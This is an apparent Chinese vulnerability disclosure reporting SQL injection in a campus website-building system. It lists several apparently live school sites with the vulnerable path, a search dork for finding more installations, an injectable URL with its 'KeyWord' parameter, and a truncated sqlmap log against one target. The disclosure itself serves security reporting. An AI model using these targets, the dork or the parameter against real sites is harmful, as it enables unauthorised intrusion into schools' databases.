某校园建站系统同一文件多处sql注入漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: sql ### 详细说明: 使用量非常多 http://www.dlwsxx.com/ws2004/model/login1.asp http://www.fzjcxx.cn/ws2004/model/login1.asp http://www.nxyancgjzx.com/ws2004/model/login1.asp http://www.sgtjb.com/ws2004/model/login1.asp http://www.sdwhys.com/ws2004/model/login1.asp http://www.zjnksyzx.com:8801/ws2004/model/login1.asp 关键词:inurl:ws2004/Model/ ``` http://www.fzjcxx.cn/ws2004/Model/default.asp?KeyWord=1&TemplateFunctionMode=32&TemplateFields=1&SearchType=0 ``` ``` [22:27:15] [WARNING] using 'C:\Users\Administrator\.sqlmap\output' as the output directory [22:27:16] [INFO] testing connection to the target URL [22:27:16] [INFO] testing if the target URL is stable. This can take a couple of seconds [22:27:17] [INFO] target URL is stable [22:27:17] [INFO] testing if GET parameter 'KeyWord' is dynamic [22:27:17] [INFO] confirming that GET parameter 'KeyWord' is dynamic [22:27:17] [INFO] GET parameter 'KeyWord' is dynamic [22:27:17] [WARNING] heuristic (basic) test shows that GET parameter...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息